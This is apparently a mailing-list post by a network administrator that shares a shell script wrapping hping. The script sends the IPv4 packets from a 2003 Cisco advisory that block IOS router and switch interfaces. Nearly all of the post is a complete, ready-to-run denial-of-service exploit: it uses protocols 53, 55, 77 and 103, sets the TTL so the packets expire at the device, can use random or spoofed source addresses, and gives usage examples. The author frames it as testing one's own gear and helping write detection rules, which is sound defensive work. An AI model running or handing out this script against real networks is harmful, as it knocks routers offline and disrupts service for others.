Here's a simple script I wrote to test our routers and switches; maybe it will come in handy for your research. I also sent an early version to the snort-users list to help them develop rules. Basically, it just wraps hping (http://www.hping.org), using parameters passed on the command line. Try targeting a host inside the network and playing around with the TTL.
--
Patrick Donahue
Network/Systems Administrator
ACMI Corporation
--- BEGIN cisco-44020.sh ---
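#!/bin/sh
# 2003-07-21 pdonahue
# cisco-44020.sh
#
# Wrapper for hping (http://www.hping.org) that sends the IPv4 traffic
# described in "Cisco Security Advisory: Cisco IOS Interface Blocked by IPv4
# Packets"
# (http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml),
# so an administrator can check whether an IOS router or switch is still
# exploitable.  Refer to the advisory for more information.
#
# Traffic generated: raw IP packets with protocol 53 (SWIPE), 55 (IP
# Mobility), 77 (Sun ND) or 103 (PIM), a random payload, and a TTL chosen so
# the packets expire at the device under test.  Those protocol numbers are
# also what a detection rule for this traffic can match on.
#
# Arguments: $1 - target hostname or address
#            $2 - TTL (0-255)
#            -p/-a/-n/-s - see usage() below
# Exit:      2 on a usage error, an invalid argument or a missing hping;
#            otherwise the last non-zero hping status, or 0.

# -- change this path to match the location of hping on your system
HPING=/usr/local/sbin/hping

# Defaults: shown in the usage text and used when an option is not given.
DEF_PROT=a
DEF_ADDR=r
DEF_NUMB=76
DEF_SIZE=26

set -u # an unset variable is a bug here, not an empty argument
set -f # $PROT is deliberately word-split below; never let it glob

# Print the usage text to stdout (callers redirect it to stderr on error).
usage() {
  cat <<EOF
usage: $0 <hostname|address> <ttl> [-p<protocol>] [-a<address>] [-n<packets>] [-s<size>]
 required:
 <hostname|address> is the target device (router/switch)
 <ttl> must be set so the packets expire (TTL=0) at the device
 optional:
 -p <protocol> is (a)ll, (53)swipe, (55)ip mobility, (77)sun nd, or (103)pim
 -a <address> is the source address of the packets; (r)andom or x.x.x.x
 -n <packets> is the number of packets to send
 -s <size> is the size of the payload in bytes
 defaults:
 $0 <hostname|address> <ttl> -p$DEF_PROT -a$DEF_ADDR -n$DEF_NUMB -s$DEF_SIZE
 examples:
 $0 10.0.0.1 0
 76 (each proto) 26-byte packets : random add. -> 10.0.0.1
 $0 10.0.0.100 11 -p53 -a10.0.0.1 -n76 -s256
 76 (swipe only) 256-byte packets : 10.0.0.1 -> 10 hops -> 10.0.0.100
EOF
}

# Report an error on stderr and stop before anything is sent.
die() {
  printf '%s: %s\n' "$0" "$*" >&2
  exit 2
}

# Succeed when $1 is a non-empty string of decimal digits.
is_uint() {
  case "$1" in
    '' | *[!0-9]*) return 1 ;;
    *) return 0 ;;
  esac
}

# Succeed when $1 is an unsigned integer with $2 <= $1 <= $3.
# A value too large for test(1) makes it fail, which is treated as out of range.
in_range() {
  is_uint "$1" &&
    [ "$1" -ge "$2" ] 2>/dev/null &&
    [ "$1" -le "$3" ] 2>/dev/null
}

# check usage
if [ "$#" -lt 2 ]; then
  usage >&2
  exit 2
fi
HOST=$1
TTL=$2
shift 2

# A target starting with '-' would be read by hping as an option.
case "$HOST" in
  '' | -*) die "invalid target: $HOST" ;;
esac
in_range "$TTL" 0 255 || die "ttl must be an integer from 0 to 255: $TTL"

# parse arguments
PROT=$DEF_PROT
ADDR=$DEF_ADDR
NUMB=$DEF_NUMB
SIZE=$DEF_SIZE
while getopts p:a:n:s: o; do
  case "$o" in
    p) PROT=$OPTARG ;; # protocol number(s), or "a" for all four
    a) ADDR=$OPTARG ;; # source address, or "r" for random
    n) NUMB=$OPTARG ;; # number of packets
    s) SIZE=$OPTARG ;; # payload size in bytes
    *)
      # getopts has already printed its own diagnostic
      usage >&2
      exit 2
      ;;
  esac
done

is_uint "$NUMB" || die "packet count must be a non-negative integer: $NUMB"
is_uint "$SIZE" || die "payload size must be a non-negative integer: $SIZE"

# replace defaults with appropriate values if still set
if [ "$PROT" = "a" ]; then
  PROT="53 55 77 103"
fi

# Validate every protocol before sending anything, so a typo in a list does
# not leave a half-finished run.
seen=0
for protocol in $PROT; do
  in_range "$protocol" 0 255 || die "invalid protocol number: $protocol"
  seen=1
done
[ "$seen" -eq 1 ] || die "no protocol given"

# Build the source-address arguments as separate words in "$@" (the original
# positional parameters are no longer needed), so the address is passed to
# hping as exactly one argument.
if [ "$ADDR" = "r" ]; then
  set -- --rand-source
else
  case "$ADDR" in
    '' | -* | *[!A-Za-z0-9._:-]*) die "invalid source address: $ADDR" ;;
  esac
  set -- -a "$ADDR"
fi

[ -x "$HPING" ] || die "hping not found or not executable: $HPING (edit HPING in this script)"

# send the packets, one hping run per protocol
status=0
for protocol in $PROT; do
  "$HPING" "$HOST" --rawip "$@" --ttl "$TTL" --ipproto "$protocol" \
    --count "$NUMB" --interval u250 --data "$SIZE" --file /dev/urandom ||
    status=$?
done
exit "$status"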
--- END cisco-44020.sh ---